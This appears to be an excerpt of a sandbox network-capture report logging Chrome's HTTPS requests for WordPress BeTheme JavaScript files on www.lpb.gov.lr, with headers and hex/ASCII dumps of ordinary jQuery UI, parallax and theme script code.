                                                                                                                        2025-01-10 13:54:49 UTC7823INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 33 2e 33 20 2d 20 32 30 32 34 2d 30 34 2d 32 36 0a 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 77 69 64 67 65 74 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 66 66 65 63 74 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6c 69 6e 64 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6f 75 6e 63 65 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 63 6c 69 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 64 72 6f 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 65 78 70
                                                                                                                        Data Ascii: /*! jQuery UI - v1.13.3 - 2024-04-26* https://jqueryui.com* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-exp
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: 68 3a 30 2c 68 65 69 67 68 74 3a 30 2c 6f 66 66 73 65 74 3a 7b 74 6f 70 3a 65 2e 70 61 67 65 59 2c 6c 65 66 74 3a 65 2e 70 61 67 65 58 7d 7d 3a 7b 77 69 64 74 68 3a 74 2e 6f 75 74 65 72 57 69 64 74 68 28 29 2c 68 65 69 67 68 74 3a 74 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 2c 6f 66 66 73 65 74 3a 74 2e 6f 66 66 73 65 74 28 29 7d 2c 76 5b 30 5d 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 26 26 28 66 2e 61 74 3d 22 6c 65 66 74 20 74 6f 70 22 29 2c 64 3d 65 2e 77 69 64 74 68 2c 70 3d 65 2e 68 65 69 67 68 74 2c 6d 3d 78 2e 65 78 74 65 6e 64 28 7b 7d 2c 67 3d 65 2e 6f 66 66 73 65 74 29 2c 78 2e 65 61 63 68 28 5b 22 6d 79 22 2c 22 61 74 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 2c 69 3d 28 66 5b 74 68 69 73 5d 7c 7c 22 22 29 2e 73 70 6c
                                                                                                                        Data Ascii: h:0,height:0,offset:{top:e.pageY,left:e.pageX}}:{width:t.outerWidth(),height:t.outerHeight(),offset:t.offset()},v[0].preventDefault&&(f.at="left top"),d=e.width,p=e.height,m=x.extend({},g=e.offset),x.each(["my","at"],function(){var t,e,i=(f[this]||"").spl
                                                                                                                        2025-01-10 13:54:49 UTC5641INData Raw: 28 65 7c 7c 74 68 69 73 2e 64 65 66 61 75 6c 74 45 6c 65 6d 65 6e 74 7c 7c 74 68 69 73 29 5b 30 5d 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 3d 78 28 65 29 2c 74 68 69 73 2e 75 75 69 64 3d 63 2b 2b 2c 74 68 69 73 2e 65 76 65 6e 74 4e 61 6d 65 73 70 61 63 65 3d 22 2e 22 2b 74 68 69 73 2e 77 69 64 67 65 74 4e 61 6d 65 2b 74 68 69 73 2e 75 75 69 64 2c 74 68 69 73 2e 62 69 6e 64 69 6e 67 73 3d 78 28 29 2c 74 68 69 73 2e 68 6f 76 65 72 61 62 6c 65 3d 78 28 29 2c 74 68 69 73 2e 66 6f 63 75 73 61 62 6c 65 3d 78 28 29 2c 74 68 69 73 2e 63 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 4c 6f 6f 6b 75 70 3d 7b 7d 2c 65 21 3d 3d 74 68 69 73 26 26 28 78 2e 64 61 74 61 28 65 2c 74 68 69 73 2e 77 69 64 67 65 74 46 75 6c 6c 4e 61 6d 65 2c 74 68 69 73 29 2c 74 68 69 73 2e 5f 6f 6e
                                                                                                                        Data Ascii: (e||this.defaultElement||this)[0],this.element=x(e),this.uuid=c++,this.eventNamespace="."+this.widgetName+this.uuid,this.bindings=x(),this.hoverable=x(),this.focusable=x(),this.classesElementLookup={},e!==this&&(x.data(e,this.widgetFullName,this),this._on


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        48192.168.2.74984369.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:49 UTC627OUTGET /wp-content/themes/betheme/js/plugins/enllax.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:49 UTC367INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:49 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "604-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 1540
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:49 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:49 UTC1540INData Raw: 2f 2a 2a 0a 20 2a 20 50 61 72 61 6c 6c 61 78 0a 20 2a 20 65 6e 6c 6c 61 78 2e 6a 73 0a 20 2a 20 31 2e 31 2e 30 20 7c 20 63 6f 70 79 72 69 67 68 74 20 32 30 31 35 2c 20 4d 4d 4b 20 4a 6f 6e 79 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 6d 6b 6a 6f 6e 79 2f 65 6e 6c 6c 61 78 2e 6a 73 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 66 6e 2e 65 6e 6c 6c 61 78 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 61 3d 74 28 77 69 6e 64 6f 77 29 2e 68 65 69 67 68 74 28 29 2c 6e 3d 74 28 64 6f 63 75 6d 65 6e 74 29 2e 68 65 69 67 68 74 28 29 2c 6f 3d 74 2e 65 78 74 65 6e 64 28 7b 72 61 74 69 6f 3a 30 2c 74 79 70 65 3a 22 62 61 63 6b 67 72 6f 75 6e 64 22 2c 64 69 72 65 63 74 69 6f 6e 3a 22
                                                                                                                        Data Ascii: /** * Parallax * enllax.js * 1.1.0 | copyright 2015, MMK Jony | https://github.com/mmkjony/enllax.js */!function(t){"use strict";t.fn.enllax=function(r){var a=t(window).height(),n=t(document).height(),o=t.extend({ratio:0,type:"background",direction:"


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        49192.168.2.74984469.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:49 UTC629OUTGET /wp-content/themes/betheme/js/parallax/translate3d.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:49 UTC367INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:49 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "fd1-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 4049
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:49 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:49 UTC4049INData Raw: 2f 2a 2a 0a 20 2a 20 50 61 72 61 6c 6c 61 78 0a 20 2a 0a 20 2a 20 54 72 61 6e 73 6c 61 74 65 33 64 0a 20 2a 20 31 2e 30 20 7c 20 4d 75 66 66 69 6e 20 47 72 6f 75 70 0a 20 2a 2f 0a 0a 76 61 72 20 6d 66 6e 53 65 74 75 70 20 3d 20 7b 0a 20 20 74 72 61 6e 73 6c 61 74 65 3a 20 6e 75 6c 6c 0a 7d 3b 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 0a 20 20 2f 2a 20 67 6c 6f 62 61 6c 73 20 6a 51 75 65 72 79 20 2a 2f 0a 0a 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 2f 2a 2a 0a 20 20 20 2a 20 6d 66 6e 53 65 74 75 70 0a 20 20 20 2a 2f 0a 0a 20 20 2f 2f 20 68 61 73 33 64 0a 0a 20 20 76 61 72 20 68 61 73 33 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 0a 20 20 20 20 69 66 20 28 21 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c
                                                                                                                        Data Ascii: /** * Parallax * * Translate3d * 1.0 | Muffin Group */var mfnSetup = { translate: null};(function($) { /* globals jQuery */ "use strict"; /** * mfnSetup */ // has3d var has3d = function() { if (!window.getComputedStyl


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        50192.168.2.74984569.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:49 UTC616OUTGET /wp-content/themes/betheme/js/scripts.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:49 UTC371INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:49 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "20ac7-60e9383bf1b3e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 133831
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:49 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:49 UTC7821INData Raw: 2f 2a 20 67 6c 6f 62 61 6c 73 20 6a 51 75 65 72 79 2c 20 6d 66 6e 20 2a 2f 0a 2f 2a 20 6a 73 68 69 6e 74 20 65 73 76 65 72 73 69 6f 6e 3a 20 36 20 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 71 75 65 72 79 20 6c 6f 6f 70 20 6d 61 73 6f 6e 72 79 20 2d 20 70 72 65 76 65 6e 74 73 20 65 72 72 6f 72 20 77 69 74 68 20 69 6e 69 74 20 69 6e 20 69 66 72 61 6d 65 0a 20 2a 2f 0a 0a 66 75 6e 63 74 69 6f 6e 20 71 75 65 72 79 4c 6f 6f 70 4d 61 73 6f 6e 72 79 28 29 20 7b 0a 20 20 6a 51 75 65 72 79 28 27 2e 6d 66 6e 2d 71 75 65 72 79 2d 6c 6f 6f 70 2d 6d 61 73 6f 6e 72 79 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 0a 20 20 20 20 6c 65 74 20 24 6d 61 73 6f 6e 72 79 20 3d 20 6a 51 75 65 72 79 28 74 68 69 73 29 3b 0a 0a 20 20 20 20 24 6d 61 73 6f 6e 72 79 2e 69 6d
                                                                                                                        Data Ascii: /* globals jQuery, mfn *//* jshint esversion: 6 *//** * query loop masonry - prevents error with init in iframe */function queryLoopMasonry() { jQuery('.mfn-query-loop-masonry').each(function() { let $masonry = jQuery(this); $masonry.im
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 3b 0a 0a 20 20 20 20 20 20 76 61 72 20 68 65 61 64 65 72 46 6f 6f 74 65 72 48 20 3d 20 68 65 61 64 65 72 57 72 61 70 70 65 72 48 20 2b 20 66 6f 6f 74 65 72 48 3b 0a 0a 20 20 20 20 20 20 76 61 72 20 64 6f 63 75 6d 65 6e 74 48 20 3d 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 68 65 69 67 68 74 28 29 20 2d 20 61 64 6d 69 6e 42 61 72 48 28 29 3b 0a 0a 20 20 20 20 20 20 69 66 20 28 20 28 20 64 6f 63 75 6d 65 6e 74 48 20 3c 3d 20 24 28 77 69 6e 64 6f 77 29 2e 68 65 69 67 68 74 28 29 20 29 20 26 26 20 28 20 68 65 61 64 65 72 46 6f 6f 74 65 72 48 20 3c 3d 20 24 28 77 69 6e 64 6f 77 29 2e 68 65 69 67 68 74 28 29 20 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 24 28 27 23 46 6f 6f 74 65 72 27 29 2e 61 64 64 43 6c 61 73 73 28 27 69 73 2d 73 74 69 63 6b 79 27 29 3b 0a 20 20
                                                                                                                        Data Ascii: ; var headerFooterH = headerWrapperH + footerH; var documentH = $(document).height() - adminBarH(); if ( ( documentH <= $(window).height() ) && ( headerFooterH <= $(window).height() ) ) { $('#Footer').addClass('is-sticky');
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 65 66 6f 72 65 5f 61 66 74 65 72 2e 74 77 65 6e 74 79 74 77 65 6e 74 79 2d 63 6f 6e 74 61 69 6e 65 72 3a 6e 6f 74 28 2e 6d 66 6e 2d 69 6e 69 74 69 61 6c 69 7a 65 64 29 27 29 2e 6c 65 6e 67 74 68 20 29 7b 0a 0a 20 20 20 20 20 20 24 28 27 2e 6d 66 6e 2d 70 6f 70 75 70 2d 74 6d 70 6c 2e 6d 66 6e 2d 70 6f 70 75 70 2d 61 63 74 69 76 65 20 2e 62 65 66 6f 72 65 5f 61 66 74 65 72 2e 74 77 65 6e 74 79 74 77 65 6e 74 79 2d 63 6f 6e 74 61 69 6e 65 72 3a 6e 6f 74 28 2e 6d 66 6e 2d 69 6e 69 74 69 61 6c 69 7a 65 64 29 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 65 6c 20 3d 20 24 28 74 68 69 73 29 3b 0a 20 20 20 20 20 20 20 20 65 6c 2e 61 64 64 43 6c 61 73 73 28 27 6d 66 6e 2d 69 6e 69 74 69 61 6c 69 7a 65 64 27 29
                                                                                                                        Data Ascii: efore_after.twentytwenty-container:not(.mfn-initialized)').length ){ $('.mfn-popup-tmpl.mfn-popup-active .before_after.twentytwenty-container:not(.mfn-initialized)').each(function(){ var el = $(this); el.addClass('mfn-initialized')
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 20 20 20 69 66 28 20 72 65 73 69 7a 65 20 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 77 69 6e 64 6f 77 29 2e 74 72 69 67 67 65 72 28 27 72 65 73 69 7a 65 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 49 73 6f 74 6f 70 65 20 69 6e 69 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 20 27 64 6f 2d 6e 6f 74 2d 72 75 6e 27 20 21 3d 3d 20 69 74 65 6d 2e 73 65 74 74 69 6e 67 73 20 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 71 75 65 75 65 4d 69 63 72 6f 74 61 73 6b 28 28 29 20 3d 3e 20 24 28 20 69 74 65 6d 2e 6c 6f 63 61 74 69 6f 6e 20 29 2e 69 73 6f 74 6f 70 65 28 20 69 74 65 6d 2e 73 65 74 74 69 6e 67 73 20 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20
                                                                                                                        Data Ascii: if( resize ){ $(window).trigger('resize'); } // Isotope init if( 'do-not-run' !== item.settings ){ queueMicrotask(() => $( item.location ).isotope( item.settings )); }
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 65 74 27 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 24 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 64 65 62 6f 75 6e 63 65 64 72 65 73 69 7a 65 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 0a 20 20 20 20 20 20 69 66 28 20 24 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 20 3c 20 37 36 37 20 29 7b 0a 20 20 20 20 20 20 20 20 73 63 72 65 65 6e 20 3d 20 27 6d 6f 62 69 6c 65 27 3b 0a 20 20 20 20 20 20 7d 65 6c 73 65 20 69 66 28 24 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 20 3c 20 39 35 39 29 7b 0a 20 20 20 20 20 20 20 20 73 63 72 65 65 6e 20 3d 20 27 74 61 62 6c 65 74 27 3b 0a 20 20 20 20 20 20 7d 65 6c 73 65 20 69 66 28 24 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 20 3e 20 39 36 30 29 7b 0a 20 20 20 20 20 20 20 20 73 63 72 65 65 6e 20 3d 20 27 64 65
                                                                                                                        Data Ascii: et'; } $(window).on('debouncedresize', function() { if( $(window).width() < 767 ){ screen = 'mobile'; }else if($(window).width() < 959){ screen = 'tablet'; }else if($(window).width() > 960){ screen = 'de
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 65 67 61 2d 6d 65 6e 75 2d 6c 69 6e 6b 27 29 20 29 7b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 20 2f 2f 20 46 49 58 3a 20 70 6c 75 67 69 6e 20 6d 61 78 6d 65 67 61 6d 65 6e 75 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 69 66 28 20 27 23 27 20 3d 3d 20 24 28 74 68 69 73 29 2e 61 74 74 72 28 27 68 72 65 66 27 29 20 29 7b 0a 20 20 20 20 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 20 20 20 20 63 6c 6f 73 65 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 2c 35 30 30 29 3b 0a 0a 20 20 20 20 20 20 7d 29 3b 0a 0a
                                                                                                                        Data Ascii: ega-menu-link') ){ return; // FIX: plugin maxmegamenu } if( '#' == $(this).attr('href') ){ e.preventDefault(); return; } setTimeout(function(){ close(); },500); });
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 65 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 73 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 6f 75 74 75 62 65 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 78 3a 20 27 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3a 20 27 76 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3a 20 27 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 65 6d 62 65 64 2f 25 69 64 25 3f 61 75 74 6f 70 6c 61 79 3d 31 26 72 65 6c 3d 30 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 6f 75 74 75 5f 62 65 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 78 3a 20 27
                                                                                                                        Data Ascii: e: { patterns: { youtube: { index: 'youtube.com/', id: 'v=', src: '//www.youtube.com/embed/%id%?autoplay=1&rel=0' }, youtu_be: { index: '
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 72 48 28 29 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 72 73 74 2e 61 64 64 43 6c 61 73 73 28 27 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 63 6c 69 63 6b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 6d 65 6e 75 5f 69 74 65 6d 20 3d 20 24 28 27 23 6d 65 6e 75 20 61 5b 64 61 74 61 2d 68 61 73 68 5d 27 29 3b 0a 20 20 20 20 20 20 20 20 69 66 28 20 24 28 27 23 6d 66 6e 2d 68 65 61 64 65 72 2d 74 65 6d 70 6c 61 74 65 27 29 2e 6c 65 6e 67 74 68 20 29 20 6d 65 6e 75 5f 69 74 65 6d 20 3d 20 24 28 27 23 6d 66 6e 2d 68 65 61 64 65 72 2d 74 65 6d 70 6c 61 74 65 20 2e 6d 66 6e 2d 68 65
                                                                                                                        Data Ascii: rH())) { first.addClass('current-menu-item'); } } } // click var menu_item = $('#menu a[data-hash]'); if( $('#mfn-header-template').length ) menu_item = $('#mfn-header-template .mfn-he
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 61 6e 67 75 61 67 65 2d 63 75 72 72 65 6e 74 29 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 65 6c 20 3d 20 24 28 74 68 69 73 29 2e 63 68 69 6c 64 72 65 6e 28 27 61 27 29 3b 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 21 65 6c 2e 63 68 69 6c 64 72 65 6e 28 27 73 70 61 6e 3a 6e 6f 74 28 2e 69 63 6c 5f 6c 61 6e 67 5f 73 65 6c 5f 62 72 61 63 6b 65 74 29 27 29 2e 6c 65 6e 67 74 68 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 65 6c 2e 77 72 61 70 49 6e 6e 65 72 28 27 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 27 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 20 20 24 28 27 23 6d 65 6e 75 20 73 70 61 6e 2e 69 63 6c 5f 6c 61 6e 67 5f 73 65 6c 5f 62 72 61 63 6b 65 74 27 29 2e 65
                                                                                                                        Data Ascii: anguage-current)').each(function() { var el = $(this).children('a'); if (!el.children('span:not(.icl_lang_sel_bracket)').length) { el.wrapInner('<span></span>'); } }); $('#menu span.icl_lang_sel_bracket').e
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 20 2f 2a 2a 0a 20 20 20 20 20 2a 20 46 61 6b 65 20 74 61 62 73 0a 20 20 20 20 20 2a 2f 0a 0a 20 20 20 20 24 28 27 2e 66 61 6b 65 2d 74 61 62 73 20 3e 20 75 6c 27 29 2e 6f 6e 28 27 63 6c 69 63 6b 27 2c 20 27 61 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 0a 20 20 20 20 20 20 76 61 72 20 24 6c 69 20 3d 20 24 28 74 68 69 73 29 2e 63 6c 6f 73 65 73 74 28 27 6c 69 27 29 3b 0a 0a 20 20 20 20 20 20 76 61 72 20 74 61 62 20 3d 20 24 6c 69 2e 64 61 74 61 28 27 74 61 62 27 29 3b 0a 0a 20 20 20 20 20 20 69 66 28 20 24 6c 69 2e 68 61 73 43 6c 61 73 73 28 27 61 63 74 69 76 65 27 29 20 29 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20
                                                                                                                        Data Ascii: /** * Fake tabs */ $('.fake-tabs > ul').on('click', 'a', function(e) { e.preventDefault(); var $li = $(this).closest('li'); var tab = $li.data('tab'); if( $li.hasClass('active') ){ return; }


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        51192.168.2.74984669.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:49 UTC626OUTGET /wp-content/themes/betheme/js/plugins/slick.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:49 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:49 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "a944-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 43332
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:49 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
